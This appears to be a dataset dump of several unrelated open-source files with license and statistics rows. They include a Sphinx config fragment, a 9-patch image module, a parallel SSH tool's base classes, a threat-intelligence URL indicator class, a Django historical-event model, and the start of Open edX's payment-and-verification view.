# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names
# to template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer.
# Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer.
# Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages
# will contain a <link> tag referring to it. The value of this option
# must be the base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'lazyscraperdoc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'lazyscraper.tex',
u'lazyscraper documentation',
u'Ivan Begtin', 'manual'),
]
# The name of an image file (relative to this directory) to place at
# the top of the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings
# are parts, not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'lazyscraper',
u'lazyscraper documentation',
[u'Ivan Begtin'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'lazyscraper',
u'lazyscraper documentation',
u'Ivan Begtin',
'lazyscraper',
'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# sphinx.ext.intersphinx confs
intersphinx_mapping = {'python': ('https://docs.python.org/2', None)}
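# A hedged example of extending the mapping above for another upstream
# project (commented out; the target URL is illustrative, not verified):
#intersphinx_mapping['requests'] = ('https://requests.readthedocs.io/en/latest/', None)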
|
apache-2.0
| -2,493,372,146,225,627,600
| 29.693141
| 84
| 0.705834
| false
| 3.728947
| true
| false
| false
|
cheery/essence
|
essence2/graphics/patch9.py
|
1
|
1727
|
from surface import Surface
def borders(surface):
    # Scan the first row/column for the opaque 9-patch border markers and
    # return the three horizontal and vertical cut positions.
    width, height = surface.size
y0 = 0
y1 = 0
x0 = 0
x1 = 0
i = 0
while i < height:
r,g,b,a = surface.at((0,i))
if a > 0:
y0 = i
break
i += 1
while i < height:
r,g,b,a = surface.at((0,i))
if a == 0:
y1 = i
break
i += 1
i = 0
while i < width:
r,g,b,a = surface.at((i,0))
if a > 0:
x0 = i
break
i += 1
while i < width:
r,g,b,a = surface.at((i,0))
if a == 0:
x1 = i
break
i += 1
return [1, x0, x1, width], [1, y0, y1, height]
class Patch9(object):
def __init__(self, surface):
self.surface = surface
self.subsurfaces = []
h, v = borders(surface)
for y in range(3):
row = []
for x in range(3):
area = (h[x], v[y]), (h[x+1]-h[x], v[y+1]-v[y])
row.append(surface.subsurface(area))
self.subsurfaces.append(row)
self.padding = h[1]-h[0], v[1]-v[0], h[3]-h[2], v[3]-v[2]
@staticmethod
def load(path):
return Patch9(Surface.load(path))
    def comm_duck(self, target, ((x,y), (w,h))):
        # Split the destination rectangle along the patch's padding and
        # feed each of the nine resulting sectors to the target callback.
        area = x,y,w,h
left, top, right, bottom = self.padding
h0, v0 = area[0], area[1]
h3, v3 = area[2] + h0, area[3] + v0
h = [h0, h0+left, h3-right, h3]
v = [v0, v0+top, v3-bottom, v3]
for y, row in enumerate(self.subsurfaces):
for x, surface in enumerate(row):
sector = (h[x], v[y]), (h[x+1]-h[x], v[y+1]-v[y])
target(surface, sector)
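# --- Hedged usage sketch (not part of the original module) ------------------
# 'button.png' is a hypothetical image whose first row/column carry the
# opaque 9-patch border markers read by borders(); the target callback just
# reports each of the nine sectors instead of blitting them.
if __name__ == '__main__':
    def debug_target(surface, ((x, y), (w, h))):
        print 'blit %dx%d sector at (%d, %d)' % (w, h, x, y)
    patch = Patch9.load('button.png')
    patch.comm_duck(debug_target, ((0, 0), (160, 48)))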
|
gpl-3.0
| -2,912,530,288,493,200,000
| 25.984375
| 65
| 0.437174
| false
| 2.922166
| false
| false
| false
|
oinume/tomahawk
|
tomahawk/base.py
|
1
|
13671
|
# -*- coding: utf-8 -*-
import multiprocessing
import os
import re
import platform
from six import print_
import six
import string
import sys
from tomahawk import (
__version__,
TimeoutError,
)
from tomahawk.color import (
create_coloring_object
)
from tomahawk.constants import (
DEFAULT_TIMEOUT,
DEFAULT_COMMAND_OUTPUT_FORMAT,
DEFAULT_EXPECT_DELAY,
DEFAULT_EXPECT_ENCODING,
OUTPUT_FORMAT_CONTROLL_CHARS,
)
from tomahawk.log import create_logger
from tomahawk.utils import (
check_hosts,
get_options_from_conf,
read_login_password,
read_login_password_from_stdin,
read_sudo_password,
read_sudo_password_from_stdin
)
class BaseContext(object):
def __init__(self, options = {}, out = sys.stdout, err = sys.stderr):
self.options = options
self.out = out
self.err = err
self.arguments, self.source, self.destination = None, None, None
class BaseMain(object):
def __init__(self, script_path):
self.script_path = script_path
self.arg_parser = self.create_argument_parser(script_path)
self.options = self.arg_parser.parse_args(sys.argv[1:])
conf_options = None
if self.options.conf:
conf_options = get_options_from_conf(
os.path.basename(script_path),
self.options.conf
)
args = conf_options + sys.argv[1:]
# Re-parse command line options because conf_options added
self.options = self.arg_parser.parse_args(args)
self.log = create_logger(
None,
self.options.debug or self.options.deep_debug,
self.options.deep_debug
)
if conf_options:
self.log.debug("Applying options %s from %s" % (str(conf_options), self.options.conf))
def run(self):
try:
if self.options.profile:
file = '%s.prof.%d' % (os.path.basename(self.script_path), os.getpid())
cProfile = __import__('cProfile')
pstats = __import__('pstats')
cProfile.runctx("self.do_run()", globals(), locals(), file)
p = pstats.Stats(file)
p.strip_dirs()
p.sort_stats('time', 'calls')
p.print_stats()
return 0 # TODO: return exit status
else:
return self.do_run()
except KeyboardInterrupt:
print_()
print_('Keyboard interrupt. exiting...')
def do_run(self):
raise Exception("This is a template method implemented by sub-class")
def check_hosts(self):
return check_hosts(self.options.__dict__, self.log, self.arg_parser.format_usage)
def confirm_execution_on_production(self, message):
if os.environ.get('TOMAHAWK_ENV') != 'production':
return
input = raw_input(message)
if input == 'yes':
print_()
else:
print_('Command execution was cancelled.')
sys.exit(0)
@classmethod
def add_common_arguments(cls, parser):
        # -h and --hosts share the same dest so the deprecated short option
        # keeps working while -H/--hosts is the documented form. (Giving both
        # actions the option string --hosts would raise an argparse conflict.)
        parser.add_argument(
            '-h', dest='hosts', metavar='HOSTS',
            help='DEPRECATED. Use -H. (Will be deleted in v0.8.0)',
        )
        parser.add_argument(
            '-H', '--hosts', metavar='HOSTS',
            help='Host names for sending commands. (split with ",")',
        )
        parser.add_argument(
            '-f', '--hosts-files', metavar='HOSTS_FILES',
            help='Hosts files which list host names. (split with ",")'
        )
        parser.add_argument(
            '-c', '--continue-on-error', action='store_true', default=None,
            help='Command execution continues despite any errors.'
        )
parser.add_argument(
'-p', '--parallel', metavar='NUM', type=int, default=1,
help='Process numbers for parallel command execution. (default: 1)'
)
parser.add_argument(
'-l', '--prompt-login-password', action='store_true',
help='Prompt a password for ssh authentication.'
)
parser.add_argument(
'--login-password-stdin', action='store_true',
help='Read a password for ssh authentication from stdin.'
)
parser.add_argument(
'-t', '--timeout', metavar='SECONDS', type=int, default=DEFAULT_TIMEOUT,
help='Specify expect timeout in seconds. (default: %d)' % (DEFAULT_TIMEOUT)
)
parser.add_argument(
'--expect-encoding', metavar='ENCODING', default=DEFAULT_EXPECT_ENCODING,
help='Expect encoding for password prompt. (default: %s)' % (DEFAULT_EXPECT_ENCODING)
)
parser.add_argument(
'-d', '--delay', type=int, default=0,
help='Command delay time in seconds. (default: 0)'
)
        parser.add_argument(
            '--expect-delay', type=float, default=DEFAULT_EXPECT_DELAY,
            help='Expect delay time in seconds. (default: %s)' % (DEFAULT_EXPECT_DELAY)
        )
parser.add_argument(
'-C', '--conf', metavar='FILE', default=None,
help='Configuration file path.'
)
parser.add_argument(
'-D', '--debug', action='store_true', default=False,
help='Enable debug output.',
)
parser.add_argument(
'--deep-debug', action='store_true', default=False,
help='Enable deeper debug output.',
)
parser.add_argument(
'--profile', action='store_true', help='Enable profiling.'
)
parser.add_argument(
'--version', action='version',
version='%(prog)s ' + __version__
+ ' with Python ' + '.'.join(map(str, sys.version_info[0:3]))
+ ' (' + platform.platform() + ')'
)
return parser
class BaseExecutor(object):
"""
A base class for CommandExecutor, RsyncExecutor
"""
def __init__(self, context, log, hosts=[], **kwargs):
"""
Constructor
Args:
context -- context
log -- log
hosts -- target hosts
"""
self.processes_terminated = False
if context is None:
raise RuntimeError('Argument "context" required.')
if len(hosts) == 0:
raise RuntimeError('Argument "hosts" length must be > 0')
options = context.options
newline = False
login_password = None
if 'login_password' in kwargs:
login_password = kwargs['login_password']
elif options.get('prompt_login_password'):
login_password = read_login_password()
newline = True
elif options.get('login_password_stdin'):
login_password = read_login_password_from_stdin()
sudo_password = None
if 'sudo_password' in kwargs:
sudo_password = kwargs['sudo_password']
elif options.get('prompt_sudo_password'):
sudo_password = read_sudo_password()
elif options.get('sudo_password_stdin'):
sudo_password = read_sudo_password_from_stdin()
if newline:
print_()
self.context = context
self.log = log
self.hosts = hosts
self.login_password = login_password
self.sudo_password = sudo_password
self.raise_error = True
if options.get('continue_on_error'):
self.raise_error = False
self.process_pool = multiprocessing.Pool(processes = options.get('parallel', 1))
def process_async_results(
self,
async_results,
create_output,
create_timeout_message,
create_timeout_raise_error_message,
create_failure_message,
create_failure_raise_error_message,
create_failure_last_message,
):
out, err = self.context.out, self.context.err
color = create_coloring_object(out)
options = self.context.options
hosts_count = len(self.hosts)
finished = 0
error_hosts_count = 0
output_format = self.output_format(options.get('output_format', DEFAULT_COMMAND_OUTPUT_FORMAT))
if six.PY2:
output_format = output_format.decode(DEFAULT_EXPECT_ENCODING)
output_format_template = string.Template(output_format)
timeout = options.get('timeout', DEFAULT_TIMEOUT)
error_prefix = color.red(color.bold('[error]')) # insert newline for error messages
execution_info = {}
# Main loop continues until all processes are done
while finished < hosts_count:
for dict in async_results:
host = dict['host']
command = dict['command']
async_result = dict['async_result']
if not async_result.ready():
continue
exit_status = 1
command_output = ''
timeout_detail = None
try:
exit_status, command_output = async_result.get(timeout = timeout)
self.log.debug("host = %s, exit_status = %d" % (host, exit_status))
except (TimeoutError, multiprocessing.TimeoutError):
error = sys.exc_info()[1]
timeout_detail = str(error)
execution_info[host] = { 'timeout': 1 }
async_results.remove(dict)
finished += 1
output = create_output(color, output_format_template, command, host, exit_status, command_output)
execution_info[host] = {
'exit_status': exit_status,
'command_output': command_output,
'timeout': False,
}
if command_output == '':
                    # if command_output is empty, chomp the trailing newline to avoid ugly output
output = re.sub(os.linesep + r'\Z', '', output)
if exit_status == 0:
if six.PY2:
output = output.encode(DEFAULT_EXPECT_ENCODING)
print_(output, file=out)
elif timeout_detail is not None:
print_('%s %s\n' % (
error_prefix,
create_timeout_message(color, output, timeout)
), file=out)
execution_info[host]['timeout'] = True
error_hosts_count += 1
if self.raise_error:
print_('%s %s\n' % (
error_prefix,
create_timeout_raise_error_message(color, command, host, timeout)
), file=err)
return 1
else:
print_('%s %s\n' % (
error_prefix,
create_failure_message(color, output, exit_status)
), file=out)
error_hosts_count += 1
if self.raise_error:
print_('%s %s' % (
error_prefix,
create_failure_raise_error_message(color, command, host)
), file=err)
return 1
# Free process pool
self.terminate_processes()
if error_hosts_count > 0:
hosts = ''
for h in self.hosts:
if execution_info[h]['exit_status'] != 0:
hosts += ' %s\n' % (h)
hosts = hosts.rstrip()
print_('%s %s' % (
error_prefix,
create_failure_last_message(color, command, hosts)
), file=err)
return 1
if options.get('verify_output'):
has_different_output = False
prev_output = None
hosts = ''
for h in self.hosts:
output = execution_info[h]['command_output']
self.log.debug("host: '%s', prev_output: '%s', output = '%s'" % (h, prev_output, output))
if prev_output != None and output != prev_output:
hosts += ' %s\n' % (h)
has_different_output = True
prev_output = output
hosts = hosts.rstrip()
if has_different_output:
print_("%s Detected different command output on following hosts.\n%s" \
% (color.red(error_prefix), hosts), file=err)
return 3
else:
print_(color.green('Verified output of all hosts.'), file=out)
return 0
def output_format(self, format):
seq = []
prev, prev_prev = None, None
for char in format:
controll_char = OUTPUT_FORMAT_CONTROLL_CHARS.get(char)
if controll_char and prev == '\\' and prev_prev == '\\':
pass
elif controll_char and prev == '\\':
seq.pop(len(seq) - 1)
seq.append(controll_char)
prev_prev = prev
prev = char
continue
seq.append(char)
prev_prev = prev
prev = char
return ''.join(seq)
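    # Hedged illustration of output_format() above: assuming
    # OUTPUT_FORMAT_CONTROLL_CHARS maps 'n' to '\n', the two-character
    # sequence backslash+'n' in a format string is rewritten to a real
    # newline, while an escaped backslash ('\\' followed by 'n') is passed
    # through so users can still emit a literal "\n".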
def terminate_processes(self):
if hasattr(self, 'process_pool') and not self.processes_terminated:
#self.process_pool.close()
self.log.debug("terminating processes")
self.process_pool.terminate()
self.process_pool.join()
self.processes_terminated = True
def __del__(self):
self.terminate_processes()
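# --- Hedged usage sketch (not part of the original module) ------------------
# Wires the shared option set into a bare parser; add_help=False because the
# deprecated hosts option claims -h. The sample argv is hypothetical.
def _example_parser():
    import argparse
    parser = BaseMain.add_common_arguments(argparse.ArgumentParser(add_help=False))
    options = parser.parse_args(['-H', 'web01,web02', '-p', '4'])
    return options.hosts, options.parallel   # ('web01,web02', 4)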
|
lgpl-2.1
| 3,294,858,065,523,848,700
| 35.849057
| 113
| 0.526443
| false
| 4.383136
| false
| false
| false
|
ThreatConnect-Inc/tcex
|
tcex/threat_intelligence/mappings/indicator/indicator_types/url.py
|
1
|
1845
|
"""ThreatConnect TI URL"""
# standard library
from urllib.parse import quote_plus
from ..indicator import Indicator
class URL(Indicator):
"""Unique API calls for URL API Endpoints"""
    def __init__(self, ti: 'ThreatIntelligence', **kwargs):
"""Initialize Class Properties.
Args:
text (str, kwargs): [Required for Create] The URL value for this Indicator.
active (bool, kwargs): If False the indicator is marked "inactive" in TC.
confidence (str, kwargs): The threat confidence for this Indicator.
date_added (str, kwargs): [Read-Only] The date timestamp the Indicator was created.
last_modified (str, kwargs): [Read-Only] The date timestamp the Indicator was last
modified.
private_flag (bool, kwargs): If True the indicator is marked as private in TC.
rating (str, kwargs): The threat rating for this Indicator.
xid (str, kwargs): The external id for this Indicator.
"""
super().__init__(ti, sub_type='URL', api_entity='url', api_branch='urls', **kwargs)
self.unique_id = kwargs.get('unique_id', kwargs.get('text'))
self.data['text'] = self.unique_id
if self.unique_id:
self.unique_id = quote_plus(self.fully_decode_uri(self.unique_id))
    def can_create(self):
        """Return True if the URL can be created.
        The URL can be created once the required 'text' value has been
        provided; otherwise it cannot.
        """
        return self.data.get('text') is not None
def _set_unique_id(self, json_response):
"""Set the unique_id provided a json response.
Args:
json_response:
"""
self.unique_id = quote_plus(self.fully_decode_uri(json_response.get('text', '')))
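# --- Hedged usage sketch (not part of the original module) ------------------
# 'ti' stands for an already-built ThreatIntelligence handle; the URL value
# is hypothetical and nothing here runs at import time.
def _example_url_indicator(ti):
    url = URL(ti, text='https://example.com/path?q=1')
    if url.can_create():         # True: 'text' was provided
        return url.unique_id     # percent-encoded form used in API paths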
|
apache-2.0
| -6,489,890,639,290,726,000
| 40
| 95
| 0.62168
| false
| 4.002169
| false
| false
| false
|
MenschMarcus/master_HistoGlobe
|
HistoGlobe_server/models/Hivent.py
|
1
|
4233
|
# ==============================================================================
# Hivent represents a significant historical happening (historical event).
# It is the only representation of the temporal dimension in the data model
# and therefore the main organisational dimension.
# An Hivent may contain one or many EditOperations to the areas of the world.
#
# ------------------------------------------------------------------------------
# Hivent 1:n EditOperation
#
# ==============================================================================
from django.db import models
from django.utils import timezone
from django.contrib import gis
from djgeojson.fields import *
from django.forms.models import model_to_dict
# ------------------------------------------------------------------------------
class Hivent(models.Model):
name = models.CharField (max_length=150, default='')
date = models.DateTimeField (default=timezone.now)
location = models.CharField (null=True, max_length=150)
description = models.CharField (null=True, max_length=1000)
link = models.CharField (null=True, max_length=300)
# ============================================================================
def __unicode__(self):
return self.name
# ============================================================================
  # given a set of validated (!) hivent data, update the Hivent properties
# ============================================================================
def update(self, hivent_data):
## save in database
self.name = hivent_data['name'] # CharField
self.date = hivent_data['date'] # DateTimeField
self.location = hivent_data['location'] # CharField
self.description = hivent_data['description'] # CharField
self.link = hivent_data['link'] # CharField
    self.save()
    return self
# ============================================================================
# return Hivent with all its associated Changes
# ============================================================================
def prepare_output(self):
from HistoGlobe_server.models import EditOperation, HiventOperation, OldArea, NewArea, UpdateArea
from HistoGlobe_server import utils
import chromelogger as console
# get original Hivent with all properties
# -> except for change
hivent = model_to_dict(self)
# get all EditOperations associated to the Hivent
hivent['edit_operations'] = []
for edit_operation_model in EditOperation.objects.filter(hivent=self):
edit_operation = model_to_dict(edit_operation_model)
# get all HiventOperations associated to the EditOperation
edit_operation['hivent_operations'] = []
for hivent_operation_model in HiventOperation.objects.filter(edit_operation=edit_operation_model):
hivent_operation = model_to_dict(hivent_operation_model)
# get all OldAreas, NewAreas and UpdateArea associated to the HiventOperation
hivent_operation['old_areas'] = []
hivent_operation['new_areas'] = []
hivent_operation['update_area'] = None
for old_area_model in OldArea.objects.filter(hivent_operation=hivent_operation_model):
hivent_operation['old_areas'].append(model_to_dict(old_area_model))
for new_area_model in NewArea.objects.filter(hivent_operation=hivent_operation_model):
hivent_operation['new_areas'].append(model_to_dict(new_area_model))
for update_area_model in UpdateArea.objects.filter(hivent_operation=hivent_operation_model):
hivent_operation['update_area'] = model_to_dict(update_area_model)
edit_operation['hivent_operations'].append(hivent_operation)
hivent['edit_operations'].append(edit_operation)
# prepare date for output
hivent['date'] = utils.get_date_string(hivent['date'])
return hivent
# ============================================================================
class Meta:
ordering = ['-date'] # descending order (2000 -> 0 -> -2000 -> ...)
app_label = 'HistoGlobe_server'
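# ------------------------------------------------------------------------------
# Hedged usage sketch (not part of the original module): assumes a configured
# Django environment; the values are hypothetical and the function is never
# called at import time.
def _example_hivent():
    hivent = Hivent()
    hivent.update({
        'name': 'Treaty of Example',
        'date': timezone.now(),
        'location': 'Example City',
        'description': 'Illustrative only.',
        'link': 'http://example.com',
    })
    return hivent.prepare_output()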
|
gpl-2.0
| -4,437,588,823,208,093,000
| 41.33
| 104
| 0.550201
| false
| 4.581169
| false
| false
| false
|
proversity-org/edx-platform
|
lms/djangoapps/verify_student/views.py
|
1
|
49530
|
"""
Views for the verification flow
"""
import datetime
import decimal
import json
import logging
import urllib
import analytics
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.contrib.staticfiles.storage import staticfiles_storage
from django.core.mail import send_mail
from django.core.urlresolvers import reverse
from django.db import transaction
from django.http import Http404, HttpResponse, HttpResponseBadRequest
from django.shortcuts import redirect
from django.utils.decorators import method_decorator
from django.utils.translation import ugettext as _
from django.utils.translation import ugettext_lazy
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
from django.views.generic.base import View
from edx_rest_api_client.exceptions import SlumberBaseException
from eventtracking import tracker
from ipware.ip import get_ip
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from pytz import UTC
from course_modes.models import CourseMode
from edxmako.shortcuts import render_to_response, render_to_string
from lms.djangoapps.commerce.utils import EcommerceService, is_account_activation_requirement_disabled
from lms.djangoapps.verify_student.image import InvalidImageData, decode_image_data
from lms.djangoapps.verify_student.models import SoftwareSecurePhotoVerification, VerificationDeadline, get_verify_student_settings
from lms.djangoapps.verify_student.ssencrypt import has_valid_signature
from openedx.core.djangoapps.commerce.utils import ecommerce_api_client
from openedx.core.djangoapps.embargo import api as embargo_api
from openedx.core.djangoapps.site_configuration import helpers as configuration_helpers
from openedx.core.djangoapps.user_api.accounts import NAME_MIN_LENGTH
from openedx.core.djangoapps.user_api.accounts.api import update_account_settings
from openedx.core.djangoapps.user_api.errors import AccountValidationError, UserNotFound
from openedx.core.lib.log_utils import audit_log
from shoppingcart.models import CertificateItem, Order
from shoppingcart.processors import get_purchase_endpoint, get_signed_purchase_params
from student.models import CourseEnrollment
from util.db import outer_atomic
from util.json_request import JsonResponse
from xmodule.modulestore.django import modulestore
log = logging.getLogger(__name__)
class PayAndVerifyView(View):
"""
View for the "verify and pay" flow.
This view is somewhat complicated, because the user
can enter it from a number of different places:
* From the "choose your track" page.
* After completing payment.
* From the dashboard in order to complete verification.
* From the dashboard in order to upgrade to a verified track.
The page will display different steps and requirements
depending on:
* Whether the user has submitted a photo verification recently.
* Whether the user has paid for the course.
* How the user reached the page (mostly affects messaging)
We are also super-paranoid about how users reach this page.
If they somehow aren't enrolled, or the course doesn't exist,
or they've unenrolled, or they've already paid/verified,
... then we try to redirect them to the page with the
most appropriate messaging (including the dashboard).
Note that this page does NOT handle re-verification
(photo verification that was denied or had an error);
that is handled by the "reverify" view.
"""
# Step definitions
#
# These represent the numbered steps a user sees in
# the verify / payment flow.
#
# Steps can either be:
# - displayed or hidden
# - complete or incomplete
#
# For example, when a user enters the verification/payment
# flow for the first time, the user will see steps
# for both payment and verification. As the user
# completes these steps (for example, submitting a photo)
# the steps will be marked "complete".
#
# If a user has already verified for another course,
# then the verification steps will be hidden,
# since the user has already completed them.
#
# If a user re-enters the flow from another application
# (for example, after completing payment through
# a third-party payment processor), then the user
# will resume the flow at an intermediate step.
#
INTRO_STEP = 'intro-step'
MAKE_PAYMENT_STEP = 'make-payment-step'
PAYMENT_CONFIRMATION_STEP = 'payment-confirmation-step'
FACE_PHOTO_STEP = 'face-photo-step'
ID_PHOTO_STEP = 'id-photo-step'
REVIEW_PHOTOS_STEP = 'review-photos-step'
ENROLLMENT_CONFIRMATION_STEP = 'enrollment-confirmation-step'
ALL_STEPS = [
INTRO_STEP,
MAKE_PAYMENT_STEP,
PAYMENT_CONFIRMATION_STEP,
FACE_PHOTO_STEP,
ID_PHOTO_STEP,
REVIEW_PHOTOS_STEP,
ENROLLMENT_CONFIRMATION_STEP
]
PAYMENT_STEPS = [
MAKE_PAYMENT_STEP,
PAYMENT_CONFIRMATION_STEP
]
VERIFICATION_STEPS = [
FACE_PHOTO_STEP,
ID_PHOTO_STEP,
REVIEW_PHOTOS_STEP,
ENROLLMENT_CONFIRMATION_STEP
]
# These steps can be skipped using the ?skip-first-step GET param
SKIP_STEPS = [
INTRO_STEP,
]
STEP_TITLES = {
INTRO_STEP: ugettext_lazy("Intro"),
MAKE_PAYMENT_STEP: ugettext_lazy("Make payment"),
PAYMENT_CONFIRMATION_STEP: ugettext_lazy("Payment confirmation"),
FACE_PHOTO_STEP: ugettext_lazy("Take photo"),
ID_PHOTO_STEP: ugettext_lazy("Take a photo of your ID"),
REVIEW_PHOTOS_STEP: ugettext_lazy("Review your info"),
ENROLLMENT_CONFIRMATION_STEP: ugettext_lazy("Enrollment confirmation"),
}
# Messages
#
    # Depending on how the user reached the page,
    # we will display different text messaging.
# For example, we show users who are upgrading
# slightly different copy than users who are verifying
# for the first time.
#
FIRST_TIME_VERIFY_MSG = 'first-time-verify'
VERIFY_NOW_MSG = 'verify-now'
VERIFY_LATER_MSG = 'verify-later'
UPGRADE_MSG = 'upgrade'
PAYMENT_CONFIRMATION_MSG = 'payment-confirmation'
# Requirements
#
# These explain to the user what he or she
# will need to successfully pay and/or verify.
#
# These are determined by the steps displayed
# to the user; for example, if the user does not
# need to complete the verification steps,
# then the photo ID and webcam requirements are hidden.
#
ACCOUNT_ACTIVATION_REQ = "account-activation-required"
PHOTO_ID_REQ = "photo-id-required"
WEBCAM_REQ = "webcam-required"
STEP_REQUIREMENTS = {
ID_PHOTO_STEP: [PHOTO_ID_REQ, WEBCAM_REQ],
FACE_PHOTO_STEP: [WEBCAM_REQ],
}
# Deadline types
VERIFICATION_DEADLINE = "verification"
UPGRADE_DEADLINE = "upgrade"
def _get_user_active_status(self, user):
"""
Returns the user's active status to the caller
Overrides the actual value if account activation has been disabled via waffle switch
Arguments:
user (User): Current user involved in the onboarding/verification flow
"""
return user.is_active or is_account_activation_requirement_disabled()
@method_decorator(login_required)
def get(
self, request, course_id,
always_show_payment=False,
current_step=None,
message=FIRST_TIME_VERIFY_MSG
):
"""
Render the payment and verification flow.
Arguments:
request (HttpRequest): The request object.
course_id (unicode): The ID of the course the user is trying
to enroll in.
Keyword Arguments:
always_show_payment (bool): If True, show the payment steps
even if the user has already paid. This is useful
for users returning to the flow after paying.
current_step (string): The current step in the flow.
message (string): The messaging to display.
Returns:
HttpResponse
Raises:
Http404: The course does not exist or does not
have a verified mode.
"""
# Parse the course key
# The URL regex should guarantee that the key format is valid.
course_key = CourseKey.from_string(course_id)
course = modulestore().get_course(course_key)
# Verify that the course exists
if course is None:
log.warn(u"Could not find course with ID %s.", course_id)
raise Http404
# Check whether the user has access to this course
# based on country access rules.
redirect_url = embargo_api.redirect_if_blocked(
course_key,
user=request.user,
ip_address=get_ip(request),
url=request.path
)
if redirect_url:
return redirect(redirect_url)
# If the verification deadline has passed
# then show the user a message that he/she can't verify.
#
# We're making the assumptions (enforced in Django admin) that:
#
# 1) Only verified modes have verification deadlines.
#
# 2) If set, verification deadlines are always AFTER upgrade deadlines, because why would you
# let someone upgrade into a verified track if they can't complete verification?
#
verification_deadline = VerificationDeadline.deadline_for_course(course.id)
response = self._response_if_deadline_passed(course, self.VERIFICATION_DEADLINE, verification_deadline)
if response is not None:
log.info(u"Verification deadline for '%s' has passed.", course.id)
return response
# Retrieve the relevant course mode for the payment/verification flow.
#
# WARNING: this is technical debt! A much better way to do this would be to
# separate out the payment flow and use the product SKU to figure out what
# the user is trying to purchase.
#
# Nonetheless, for the time being we continue to make the really ugly assumption
# that at some point there was a paid course mode we can query for the price.
relevant_course_mode = self._get_paid_mode(course_key)
# If we can find a relevant course mode, then log that we're entering the flow
# Otherwise, this course does not support payment/verification, so respond with a 404.
if relevant_course_mode is not None:
if CourseMode.is_verified_mode(relevant_course_mode):
log.info(
u"Entering payment and verification flow for user '%s', course '%s', with current step '%s'.",
request.user.id, course_id, current_step
)
else:
log.info(
u"Entering payment flow for user '%s', course '%s', with current step '%s'",
request.user.id, course_id, current_step
)
else:
# Otherwise, there has never been a verified/paid mode,
# so return a page not found response.
log.warn(
u"No paid/verified course mode found for course '%s' for verification/payment flow request",
course_id
)
raise Http404
# If the user is trying to *pay* and the upgrade deadline has passed,
# then they shouldn't be able to enter the flow.
#
# NOTE: This should match the availability dates used by the E-Commerce service
# to determine whether a user can purchase a product. The idea is that if the service
# won't fulfill the order, we shouldn't even let the user get into the payment flow.
#
user_is_trying_to_pay = message in [self.FIRST_TIME_VERIFY_MSG, self.UPGRADE_MSG]
if user_is_trying_to_pay:
upgrade_deadline = relevant_course_mode.expiration_datetime
response = self._response_if_deadline_passed(course, self.UPGRADE_DEADLINE, upgrade_deadline)
if response is not None:
log.info(u"Upgrade deadline for '%s' has passed.", course.id)
return response
# Check whether the user has verified, paid, and enrolled.
# A user is considered "paid" if he or she has an enrollment
# with a paid course mode (such as "verified").
# For this reason, every paid user is enrolled, but not
# every enrolled user is paid.
        # If the course mode is not verified (i.e. only paid) then already_verified is always True
already_verified = (
self._check_already_verified(request.user)
if CourseMode.is_verified_mode(relevant_course_mode)
else True
)
already_paid, is_enrolled = self._check_enrollment(request.user, course_key)
# Redirect the user to a more appropriate page if the
# messaging won't make sense based on the user's
# enrollment / payment / verification status.
sku_to_use = relevant_course_mode.sku
purchase_workflow = request.GET.get('purchase_workflow', 'single')
if purchase_workflow == 'bulk' and relevant_course_mode.bulk_sku:
sku_to_use = relevant_course_mode.bulk_sku
redirect_response = self._redirect_if_necessary(
message,
already_verified,
already_paid,
is_enrolled,
course_key,
user_is_trying_to_pay,
request.user,
sku_to_use
)
if redirect_response is not None:
return redirect_response
display_steps = self._display_steps(
always_show_payment,
already_verified,
already_paid,
relevant_course_mode
)
# Override the actual value if account activation has been disabled
# Also see the reference to this parameter in context dictionary further down
user_is_active = self._get_user_active_status(request.user)
requirements = self._requirements(display_steps, user_is_active)
if current_step is None:
current_step = display_steps[0]['name']
# Allow the caller to skip the first page
# This is useful if we want the user to be able to
# use the "back" button to return to the previous step.
# This parameter should only work for known skip-able steps
if request.GET.get('skip-first-step') and current_step in self.SKIP_STEPS:
display_step_names = [step['name'] for step in display_steps]
current_step_idx = display_step_names.index(current_step)
if (current_step_idx + 1) < len(display_steps):
current_step = display_steps[current_step_idx + 1]['name']
courseware_url = ""
if not course.start or course.start < datetime.datetime.today().replace(tzinfo=UTC):
courseware_url = reverse(
'course_root',
kwargs={'course_id': unicode(course_key)}
)
full_name = (
request.user.profile.name
if request.user.profile.name
else ""
)
# If the user set a contribution amount on another page,
# use that amount to pre-fill the price selection form.
contribution_amount = request.session.get(
'donation_for_course', {}
).get(unicode(course_key), '')
# Remember whether the user is upgrading
# so we can fire an analytics event upon payment.
